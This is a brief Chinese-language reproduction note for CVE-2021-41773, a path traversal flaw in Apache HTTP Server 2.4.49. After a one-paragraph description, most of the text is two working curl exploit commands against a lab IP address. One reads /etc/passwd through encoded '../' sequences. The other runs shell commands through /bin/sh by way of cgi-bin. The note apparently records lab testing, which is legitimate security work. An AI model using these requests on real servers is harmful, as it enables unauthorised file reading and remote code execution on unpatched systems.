在Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞(CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行。
漏洞复现
curl -v --path-as-is http://192.168.66.102:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
curl -v --data “echo;id” ‘http://192.168.66.102:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’
使用burp